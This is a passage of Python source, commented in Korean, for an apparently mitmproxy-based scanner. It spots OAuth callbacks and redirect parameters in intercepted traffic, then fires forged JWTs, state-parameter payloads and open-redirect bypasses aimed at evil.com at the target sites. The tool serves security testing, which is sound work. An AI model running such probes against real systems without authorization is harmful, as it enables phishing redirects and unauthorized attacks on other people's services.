header_b64 = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip('=')
payload_b64 = base64.urlsafe_b64encode(json.dumps(payload).encode()).decode().rstrip('=')
jwt_token = f"{header_b64}.{payload_b64}.fake_signature"
results.append(jwt_token)
# 첫 번째 조작된 JWT 사용
parsed = urlparse(original)
return f"https://{parsed.netloc}{parsed.path}?state={results[0]}&redirect_uri=https://evil.com"
# 52. JWT 페이로드 오염 공격
def _mutate_pattern52(self, original: str) -> str:
import base64
import json
# 페이로드에 다양한 클레임 주입
malicious_payload = {
"iss": "https://evil.com", # 발급자 변조
"aud": "evil_client", # 대상 변조
"redirect": "https://evil.com", # 직접적인 리다이렉트
"redirect_uri": "https://evil.com", # OAuth 파라미터
"url": "https://evil.com", # 일반적인 URL 파라미터
"callback": "https://evil.com", # 콜백 URL
"return_to": "https://evil.com", # 리턴 URL
"admin": True, # 권한 상승 시도
"role": "admin" # 역할 변조
}
header = {"alg": "HS256", "typ": "JWT"}
header_b64 = base64.urlsafe_b64encode(json.dumps(header).encode()).decode().rstrip('=')
payload_b64 = base64.urlsafe_b64encode(json.dumps(malicious_payload).encode()).decode().rstrip('=')
jwt_token = f"{header_b64}.{payload_b64}.evil_signature"
parsed = urlparse(original)
return f"https://{parsed.netloc}{parsed.path}?state={jwt_token}&redirect_uri=https://evil.com"
'''aiohttp 세션 생성 (재사용)'''
async def _get_session(self):
if self.session is None:
timeout = aiohttp.ClientTimeout(total=10)
self.session = aiohttp.ClientSession(timeout=timeout)
return self.session
'''세션 정리'''
async def close_session(self):
if self.session:
await self.session.close()
self.session = None
""" 우회된 URL에 GET 요청을 보내고, 서버 응답 정보 반환 """
async def _send_request(self, url, headers=None, record_to_limiter=True):
try:
session = await self._get_session() # 세션 준비
request_headers = headers or {} # 요청 헤더 설정 - headers가 주어지지 않았다면 빈 딕셔너리 사용
# 서버에 GET 요청 전송 (allow_redirects=False로 리다이렉트 추적)
async with session.get(url, allow_redirects=False, headers=request_headers) as response:
result = {
'status': response.status,
'location': response.headers.get("Location", ""),
'headers': dict(response.headers)
}
# 성공/실패 기록 (rate limiter용)
if record_to_limiter:
if response.status in [200, 301, 302, 303, 307, 308]:
redirect_limiter.record_success()
else:
redirect_limiter.record_failure(f"HTTP {response.status}")
return result
except Exception as e:
redirect_limiter.record_failure(str(e))
print(f"[ERROR] 요청 실패 ({url}): {e}")
return {'status': 500, 'location': '', 'headers': {}}
def _track_redirect_uri_from_authorization(self, url, parsed, query):
"""Authorization 요청에서 redirect_uri 추적"""
# 메이저 OAuth 제공자에서만 추적
major_oauth_providers = [
"accounts.google.com", "oauth2.googleapis.com",
"www.facebook.com", "facebook.com", "graph.facebook.com",
"github.com", "api.github.com",
"login.microsoftonline.com", "login.live.com",
"login.microsoft.com", "account.microsoft.com",
"appleid.apple.com", "accounts.apple.com",
"login.yahoo.com", "accounts.twitter.com", "api.twitter.com",
"linkedin.com", "www.linkedin.com"
]
# 메이저 OAuth 제공자가 아니면 추적하지 않음
if not any(provider in parsed.netloc for provider in major_oauth_providers):
return False
if 'redirect_uri' in query:
redirect_uri = unquote(query['redirect_uri'][0])
# 글로벌 저장소에 추가
GLOBAL_REDIRECT_TRACKING['tracked_redirect_uris'].add(redirect_uri)
print(f"[REDIRECT_TRACKING] 📝 redirect_uri 추적: {redirect_uri}")
# 정기적인 정리
self._cleanup_old_tracking_data()
return True
def _is_tracked_oauth_callback(self, url, parsed, query):
"""추적된 redirect_uri와 현재 요청이 매칭되는지 확인"""
current_base_url = f"https://{parsed.netloc}{parsed.path}"
if not GLOBAL_REDIRECT_TRACKING['tracked_redirect_uris']:
return False
for tracked_uri in GLOBAL_REDIRECT_TRACKING['tracked_redirect_uris']:
if current_base_url == tracked_uri:
return True
return False
def _is_client_redirect_request(self, url, parsed, query):
"""OAuth 콜백 감지 - OAuth 로그인 완료 후 돌아온 페이지인가 확인"""
# B2B/내부 시스템 도메인 제외
internal_domains = [
'zendesk.com',
'salesforce.com',
'servicenow.com',
'atlassian.com',
]
if any(domain in parsed.netloc.lower() for domain in internal_domains):
return False
# OAuth 제공자 제외
oauth_provider_domains = [
# Google
"accounts.google.com", "oauth2.googleapis.com",
# Facebook/Meta
"www.facebook.com", "facebook.com", "graph.facebook.com",
# Microsoft
"login.live.com", "login.microsoftonline.com", "account.live.com",
"login.windows.net", "login.microsoft.com",
# GitHub
"github.com", "api.github.com",
# Apple
"appleid.apple.com", "accounts.apple.com",
# Others
"login.yahoo.com", "accounts.twitter.com", "api.twitter.com",
"linkedin.com", "www.linkedin.com",
"kauth.kakao.com", "accounts.kakao.com",
# 추가 제외할 제공자들
"auth0.com", "okta.com", "onelogin.com"
]
if any(provider in parsed.netloc for provider in oauth_provider_domains):
return False
# 0. 추적된 redirect_uri 매칭
if self._is_tracked_oauth_callback(url, parsed, query):
# OAuth 응답 파라미터도 확인
oauth_response_params = ['code', 'access_token', 'id_token', 'state', 'error']
has_oauth_response = any(param in query for param in oauth_response_params)
if has_oauth_response:
print(f"[TRACKED_OAUTH] 🎯 추적된 OAuth 콜백 감지: {parsed.netloc}")
return True
# 1. URL 경로로 OAuth 콜백인지 확인 - 기존 OAuth 콜백 패턴
oauth_callback_patterns = [
'/oauth/callback', '/auth/callback', '/login/callback',
'/oauth/redirect', '/auth/return', '/sso/callback',
'/signup', '/register',
'/api/auth/v3/social/callback', '/social/callback', '/auth/social/callback',
'/access/return_to', '/access/', '/return',
]
path = parsed.path.lower()
is_oauth_callback = any(pattern in path for pattern in oauth_callback_patterns)
# 2. OAuth 응답 파라미터 확인 - URL에 아래 정보 있는지 확인
oauth_response_params = [
'code', 'access_token', 'id_token', 'state', 'error',
'from' # from=fb, from=google 등
]
has_oauth_response = any(param in query for param in oauth_response_params)
# 3. 소셜 로그인 패턴 감지 - 어디서 로그인했는지 확인
def has_social_login_pattern(query_string):
import re
# 패턴 1: 간단한 소셜 식별자
simple_patterns = [
'from=fb', 'from=facebook', 'from=google', 'from=github',
'provider=google', 'provider=facebook',
'callback/google', 'callback/github', 'callback/facebook' # ← URL 경로 패턴
]
has_simple = any(pattern in query_string.lower() for pattern in simple_patterns)
# 패턴 2: URL 형태
url_pattern = r'from=https?%3A%2F%2F' # from=https:// (URL 인코딩됨)
has_url = bool(re.search(url_pattern, query_string))
return has_simple or has_url
query_string = parsed.query
has_social_login = has_social_login_pattern(query_string)
# 4. 리다이렉트 파라미터(우리가 공격할 타겟) 확인
client_redirect_params = [
'next', 'return_to', 'continue', 'redirect_uri', 'redirect_url',
'destination', 'success_url', 'callback_url', 'goto', 'forward_to',
'redirectUrl', 'redirectURL', 'redirect_to', 'returnUrl', 'returnURL',
'from', 'target', 'targetUrl', 'targetURL',
]
has_redirect_param = any(param in query for param in client_redirect_params)
# 5. OAuth 혼합 패턴 감지 (요청+응답 파라미터 동시 존재)
oauth_request_params = ['client_id', 'response_type']
oauth_redirect_params = ['return_to', 'redirect_uri']
has_oauth_request = any(param in query for param in oauth_request_params)
has_oauth_redirect = any(param in query for param in oauth_redirect_params)
# 최종 판단 기준 1 - (콜백 경로 + OAuth 파라미터) 또는 소셜 로그인 있고, 리다이렉트 파라미터 또는 state 있으면 → OAuth 콜백!
if (is_oauth_callback and has_oauth_response) or has_social_login:
if has_redirect_param or 'state' in query:
print(f"[CLIENT_OAUTH] 📱 OAuth 콜백 감지: {parsed.netloc}")
return True
# 최종 판단 기준 2 - OAuth 요청 파라미터와 리다이렉트 파라미터가 둘 다 있으면 → OAuth 혼합 패턴!
if has_oauth_request and has_oauth_redirect:
print(f"[CLIENT_OAUTH] 📱 OAuth 혼합 패턴 감지: {parsed.netloc}")
return True
# 리다이렉트 패턴 + 리다이렉트 파라미터면 충분
if is_oauth_callback and has_redirect_param:
print(f"[CLIENT_REDIRECT] 📱 최종 리다이렉트 엔드포인트 감지: {parsed.netloc}")
return True
return False
def _is_self_oauth_request(self, url, parsed, query):
"""자체 OAuth - authorize 엔드포인트 요청인지 확인 (로그인 불필요)"""
# OAuth 제공자 도메인 제외
oauth_provider_domains = [
"accounts.google.com", "oauth2.googleapis.com",
"www.facebook.com", "facebook.com", "graph.facebook.com",
"github.com", "api.github.com",
"login.microsoftonline.com", "login.live.com",
"account.live.com", "login.windows.net", "login.microsoft.com",
"appleid.apple.com", "accounts.apple.com",
"login.yahoo.com", "accounts.twitter.com","api.twitter.com",
"linkedin.com", "www.linkedin.com",
"okta.com",
"auth0.com", "onelogin.com",
]
if any(provider in parsed.netloc for provider in oauth_provider_domains):
return False
# B2B 연동 제외 (redirect_uri 기반)
if 'redirect_uri' in query:
redirect_uri = unquote(query['redirect_uri'][0])
# B2B/내부 시스템 도메인들
internal_domains = [
'zendesk.com',
'salesforce.com',
'servicenow.com',
'atlassian.com',
'slack.com',
]
# redirect_uri가 내부 시스템이면 제외
if any(domain in redirect_uri.lower() for domain in internal_domains):
return False
# 내부 시스템 연동 경로 제외
internal_system_patterns = [
'/websso/bootstrap', # SSO 부트스트랩
'/api/internal/', # 내부 API
'/system/', # 시스템 연동
]
path = parsed.path.lower()
if any(pattern in path for pattern in internal_system_patterns):
return False
# 1. 자체 OAuth 엔드포인트 패턴 확인
oauth_endpoints = [
'/oauth/authorize', '/oauth/auth', '/auth/oauth',
'/sso/authorize', '/api/oauth/authorize',
'/v1/oauth/authorize', '/oauth2/authorize',
'/oauth2/v1/authorize',
'/authorize', # 일반적인 authorize 추가
'/auth/realms', # Keycloak 패턴
'/connect/authorize', # IdentityServer 패턴
'/idp/', # ← Identity Provider 패턴
'/signin', # ← Sign-in 패턴
'/auth/signin', # ← Auth Sign-in 패턴
'/identity/', # ← Identity 패턴
]
path = parsed.path.lower()
is_oauth_path = any(endpoint in path for endpoint in oauth_endpoints)
# 2. OAuth 요청 파라미터 확인 - OAuth 로그인에 필요한 정보들이 있는지 확인
oauth_request_params = ['client_id', 'redirect_uri', 'response_type', 'scope']
has_oauth_params = any(param in query for param in oauth_request_params)
# 3. 표준 OAuth 파라미터 조합 확인 - OAuth의 핵심 3요소가 모두 있는지 확인
has_standard_oauth = (
'client_id' in query and
'redirect_uri' in query and
'response_type' in query
)
# 최종 판단 기준 - 조건 1: (OAuth 경로 + OAuth 파라미터) 있거나 조건 2: 표준 OAuth 3요소 모두 있으면 → 자체 OAuth 시스템!
if (is_oauth_path and has_oauth_params) or has_standard_oauth:
print(f"[SELF_OAUTH] 🏠 자체 OAuth 제공자 감지: {parsed.netloc}")
return True
return False
async def test(self, flow: http.HTTPFlow):
"""테스트 시작점 - url 받아와서 oauth 콜백/자체 oauth인지 체크"""
url = flow.request.pretty_url
parsed = urlparse(url)
query = parse_qs(parsed.query)
if flow.request.method != "GET":
return
# 1. Authorization 요청에서 redirect_uri 추적
if self._track_redirect_uri_from_authorization(url, parsed, query):
return # Authorization 요청은 여기서 끝
# 2. 각 조건을 독립적으로 체크하여 우선순위 결정
is_tracked_callback = self._is_tracked_oauth_callback(url, parsed, query)
is_self_oauth = self._is_self_oauth_request(url, parsed, query)
is_client_redirect = self._is_client_redirect_request(url, parsed, query)
# 3. 우선순위에 따라 테스트 (높은 위험도 우선)
if is_self_oauth: # 가장 높은 위험도
print(f"[TEST_TYPE] 🏠 자체 OAuth 시스템: {parsed.netloc}")
await self._test_oauth_redirect(url, parsed, query, test_type="SELF_OAUTH")
elif is_tracked_callback: # 중간 위험도
print(f"[TEST_TYPE] 🎯 추적된 OAuth 콜백: {parsed.netloc}")
await self._test_oauth_redirect(url, parsed, query, test_type="TRACKED_CALLBACK")
elif is_client_redirect: # 일반 위험도
print(f"[TEST_TYPE] 📱 클라이언트 리다이렉트: {parsed.netloc}")
await self._test_oauth_redirect(url, parsed, query, test_type="CLIENT_REDIRECT")
return
def _remove_tracked_uri(self, uri_to_remove):
"""테스트 완료된 URI를 추적 목록에서 제거"""
if uri_to_remove in GLOBAL_REDIRECT_TRACKING['tracked_redirect_uris']:
GLOBAL_REDIRECT_TRACKING['tracked_redirect_uris'].discard(uri_to_remove)
async def _test_oauth_redirect(self, url, parsed, query, test_type="UNKNOWN"):
"""OAuth 리다이렉트 취약점 테스트"""
# 테스트 타입별로 중복 방지
endpoint_key = f"{test_type}:{parsed.netloc}{parsed.path}"
if endpoint_key in self.tested_endpoints:
return # 이미 테스트했으므로 패스
if endpoint_key in self.testing_targets:
return # 현재 테스트 중이므로 패스
self.testing_targets.add(endpoint_key)
# 현재 테스트할 URI 저장
current_uri = f"https://{parsed.netloc}{parsed.path}"
try:
print(f"[START] 🔍 테스트 시작 ({test_type}): {parsed.netloc}{parsed.path}")
print(f"[TARGET] 타겟: {parsed.netloc}")
# 1. state 파라미터 확인 후 조작
if 'state' in query:
await self._test_state_parameter_manipulation(url, parsed, query)
# 일반 리다이렉트 파라미터 테스트를 위해 Rate Limiter 리셋
redirect_limiter.reset_for_new_target()
# 2. 테스트할 파라미터들 찾기
test_params = []
# redirect_uri (자체 OAuth에서 주로 사용)
if 'redirect_uri' in query:
test_params.append(('redirect_uri', query['redirect_uri'][0]))
# 클라이언트 리다이렉트 파라미터들
client_redirect_params = [
'next', 'return_to', 'continue', 'redirect_url',
'destination', 'success_url', 'callback_url', 'goto', 'forward_to',
'redirectUrl', 'from', 'target'
]
for param in client_redirect_params:
if param in query:
test_params.append((param, query[param][0]))
# 테스트할 파라미터가 없으면 종료
if not test_params:
print(f"[{test_type}] 리다이렉트 파라미터 없음 - 테스트 ❌")
# 테스트할 파라미터 없을 때도 URI 정리
if test_type == "TRACKED_CALLBACK":
self._remove_tracked_uri(current_uri)
return
print(f"[OAUTH] 📍 발견된 파라미터들: {test_params}")
print(f"[OPEN_REDIRECT] 총 우회 패턴: {len(self.bypass_payloads)}")
print("-" * 50)
success_count = 0
# 3. 각 파라미터별로 모든 우회 패턴 테스트
for param_name, original_value in test_params:
print(f"\n[{test_type}] 🎯 {param_name} 파라미터 테스트 시작")
for i, payload in enumerate(self.bypass_payloads, 1):
print(f"[{i:2d}/{len(self.bypass_payloads)}] {payload.name}", end=" ... ")
result = await self._test_bypass_pattern(
url, query, parsed, original_value, payload, param_name
)
if result:
success_count += 1
print("🚨 VULNERABLE!")
else:
print("")
# 조기 종료 체크 (연속 실패)
can_proceed = await redirect_limiter.wait_if_needed(payload.name)
if not can_proceed:
print(f"\n[TARGET_ABANDON] 🚫 타겟 포기로 인한 테스트 조기 종료")
break
# 한 파라미터에서 포기했으면 다른 파라미터도 건너뛰기
if redirect_limiter.should_abandon_target:
break
print("-" * 50)
print(f"[OAUTH] ✅ OAuth 테스트 완료: {success_count}개 취약점")
# 테스트 완료 후 URI 정리
if test_type == "TRACKED_CALLBACK":
self._remove_tracked_uri(current_uri)
except Exception as e:
print(f"[ERROR] {test_type} 테스트 실패: {e}")
# 에러 발생 시에도 URI 정리
if test_type == "TRACKED_CALLBACK":
self._remove_tracked_uri(current_uri)
finally:
self.testing_targets.discard(endpoint_key)
self.tested_endpoints.add(endpoint_key)
await self.close_session()
async def _test_state_parameter_manipulation(self, url, parsed, query):
"""State 파라미터 조작 테스트"""
print(f"[STATE_TEST] 🔍 State 파라미터 조작 테스트")
# 원본 state 확인
original_state = query['state'][0]
print(f"[STATE_TEST] 원본 state: {original_state[:50]}...")
# State 공격 패턴들
state_attacks = {
"state_direct_url": "https://evil.com",
"state_protocol_relative": "//evil.com",
"state_json_redirect": '{"redirect": "https://evil.com"}',
"state_json_return_to": '{"return_to": "https://evil.com"}',
"state_json_callback": '{"callback": "https://evil.com"}',
"state_query_redirect": "redirect=https://evil.com",
"state_query_return_to": "return_to=https://evil.com",
"state_base64_json": "eyJyZWRpcmVjdCI6ICJodHRwczovL2V2aWwuY29tIn0=",
"state_jwt_attack": "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJyZWRpcmVjdCI6Imh0dHBzOi8vZXZpbC5jb20ifQ.",
"state_original_append": f"{original_state}&redirect=https://evil.com",
"state_original_pipe": f"{original_state}|https://evil.com",
"state_url_encoded": "https%3A//evil.com"
}
success_count = 0
for i, (attack_name, malicious_state) in enumerate(state_attacks.items(), 1):
print(f"[STATE_TEST] [{i:2d}/{len(state_attacks)}] {attack_name}")
# 원본 쿼리 복사하고 state만 변경
modified_query = query.copy()
modified_query['state'] = [malicious_state]
# 새 URL 생성
new_query_string = urlencode(modified_query, doseq=True)
test_url = urlunparse(parsed._replace(query=new_query_string))
# 요청 전송
response = await self._send_request(test_url, record_to_limiter=False)
# State 전용 취약점 분석
if await self._analyze_state_vulnerability(url, test_url, malicious_state, response, attack_name):
success_count += 1
print(f"[STATE_TEST] ✅ 취약점 발견! {attack_name}")
else:
print(f"[STATE_TEST] ✓ {attack_name}")
await asyncio.sleep(1) # 1초 대기
print(f"[STATE_TEST] ✅ State 테스트 완료: {success_count}/{len(state_attacks)} 취약점 발견")
async def _analyze_state_vulnerability(self, original_url, test_url, malicious_state, response, attack_name):
"""State 파라미터 취약점 전용 분석"""
status = response['status']
location = response['location']
# 리다이렉트 응답인지 확인
if status not in [301, 302, 303, 307, 308]:
return False
if not location:
return False
# 악성 도메인으로 리다이렉트되었는지 확인
if self._is_redirected_to_malicious_domain(location):
print(f"[🎯 VULNERABILITY CONFIRMED] OAuth State 조작 취약점 발견!")
await self._report_state_vulnerability(
original_url, test_url, malicious_state,
location, attack_name
)
return True
return False
async def _report_state_vulnerability(self, original_url, test_url, malicious_state, location, attack_name):
"""State 파라미터 취약점 전용 리포트"""
description = (
f"OAuth State Parameter Manipulation 취약점 발견!\n\n"
f"• 공격 방법: {attack_name}\n"
f"• 원본 URL: {original_url}\n"
f"• 조작된 state 값: {malicious_state}\n"
f"• 테스트 URL: {test_url}\n"
f"• 실제 리다이렉트 위치: {location}\n\n"
f"🚨 State 파라미터 조작을 통한 피싱 공격이 가능합니다!\n"
)
report_vuln(
title="OAuth State Parameter Manipulation Vulnerability",
desc=description,
status="HIGH",
uri=test_url
)
print(f"🎯 OAuth State 조작 취약점 발견 및 보고 완료!")
""" 우회 URL 생성 및 요청 전송 """
async def _test_bypass_pattern(self, original_url, query, parsed_url, original_redirect_value, payload, redirect_param):
# 레이트 리미팅 체크
can_proceed = await redirect_limiter.wait_if_needed(payload.name)
if not can_proceed:
return False
try:
# 1. 우회 URL 생성
if original_redirect_value.startswith('http'):
# 이미 완전한 URL인 경우
bypassed_redirect = payload.mutate(original_redirect_value)
else:
# 상대 경로인 경우 완전한 URL로 만들어서 우회
full_original = f"https://{original_redirect_value}"
bypassed_redirect = payload.mutate(full_original)
# 2. 파라미터 보존 전략 - 원본 url의 다른 파라미터들은 그대로 두고 redirect 파라미터만 악성으로 바꿈
modified_query = query.copy()
modified_query[redirect_param] = [bypassed_redirect]
new_query_string = urlencode(modified_query, doseq=True)
test_url = urlunparse(parsed_url._replace(query=new_query_string))
# 3. 요청 전송
response = await self._send_request(test_url)
# 4. 응답 분석
result = await self._analyze_response(original_url, test_url, bypassed_redirect, response, payload)
return result
except Exception as e:
print(f"[PATTERN] ❌ {payload.name} → ERROR: {e}")
return False
""" 응답 분석 """
async def _analyze_response(self, original_url, test_url, bypassed_redirect, response, payload):
status = response['status']
location = response['location']
# 리다이렉트 응답인지 확인
if status not in [301, 302, 303, 307, 308]:
return False
if not location:
return False
# 악성 도메인으로 리다이렉트되었는지 확인
if self._is_redirected_to_malicious_domain(location):
print(f"[🎯 VULNERABILITY CONFIRMED] Open Redirect 취약점 발견!")
await self._report_open_redirect_vulnerability(
original_url, test_url, bypassed_redirect,
location, payload
)
return True
return False
def _is_redirected_to_malicious_domain(self, location: str) -> bool:
"""실제로 악성 도메인으로 리다이렉트되었는지 확인"""
try:
location_parsed = urlparse(location)
location_host = location_parsed.hostname
# 실제 호스트만 확인 (URL 파라미터는 무시)
if not location_host:
return False
# 메이저 OAuth 제공자 도메인이면 취약점 아님
safe_domains = [
# Google (구글)
"accounts.google.com", "google.com", "www.google.com",
"oauth2.googleapis.com", "accounts.youtube.com",
# Facebook/Meta (페이스북)
"www.facebook.com", "facebook.com", "m.facebook.com",
"graph.facebook.com", "developers.facebook.com",
# GitHub (깃헙) ← 추가!
"github.com", "www.github.com", "api.github.com",
# Microsoft (마이크로소프트) ← 추가!
"login.microsoftonline.com", "login.live.com",
"account.live.com", "login.windows.net", "login.microsoft.com",
"outlook.live.com", "account.microsoft.com",
]
if any(safe_domain in location_host.lower() for safe_domain in safe_domains):
return False
# 실제 악성 도메인들
malicious_domains = ["evil.com", "attacker.com", "malicious.site"]
if any(domain in location_host.lower() for domain in malicious_domains):
print(f"[MALICIOUS_REDIRECT] 🚨 악성 도메인으로 리다이렉트 감지: {location_host}")
return True
return False
except Exception as e:
return False
""" 취약점 보고서 생성 """
async def _report_open_redirect_vulnerability(self, original_url, test_url, bypassed_redirect, location, payload):
"""Open Redirect 취약점 보고서 생성"""
pattern_name = getattr(payload, 'name', 'unknown')
pattern_description = getattr(payload, 'description', 'Unknown bypass pattern')
description = (
f"Open Redirect 취약점 발견!\n\n"
f"• 우회 패턴: {pattern_name}\n"
f"• 설명: {pattern_description}\n"
f"• 원본 URL: {original_url}\n"
f"• 우회된 redirect 값: {bypassed_redirect}\n"
f"• 테스트 URL: {test_url}\n"
f"• 실제 리다이렉트 위치: {location}\n\n"
f"🚨 이 취약점을 이용하면 피싱 공격이 가능합니다!\n"
)
report_vuln(
title="OAuth Open Redirect Vulnerability",
desc=description,
status="MEDIUM",
uri=test_url
)
print(f"🎯 OAuth Open Redirect 취약점 발견 및 보고 완료!")
def reset_session(self):
"""새 세션 시작 (새 타겟 사이트 테스트 시)"""
if len(self.tested_endpoints) > 1000:
old_entries = list(self.tested_endpoints)[:500]
for entry in old_entries:
self.tested_endpoints.discard(entry)
self.testing_targets.clear()
async def cleanup(self):
"""정리 작업"""
await self.close_session()